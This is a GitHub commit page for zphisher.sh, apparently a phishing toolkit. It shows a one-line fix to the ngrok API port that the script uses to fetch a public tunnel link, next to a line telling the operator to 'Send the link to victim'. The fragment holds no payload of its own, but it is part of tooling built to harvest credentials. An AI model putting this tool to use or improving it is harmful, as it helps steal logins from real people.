Skip to content

Commit 7ea91da

Browse files
authored
Update zphisher.sh
1 parent 75baf2b commit 7ea91da

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

zphisher.sh

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -322,7 +322,7 @@ sleep 2
322322
./ngrok http 5555 > /dev/null 2>&1 &
323323
sleep 10
324324

325-
link=$(curl -s -N http://127.0.0.1:4041/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
325+
link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[0-9a-z]*\.ngrok.io")
326326
printf "\n\e[96m[\e[0m\e[1;77m~\e[96m]\e[0m\e[1;96m Send the link to victim :\e[0m\e[1;93m %s \n" $link
327327
found
328328
}

0 commit comments

Comments
 (0)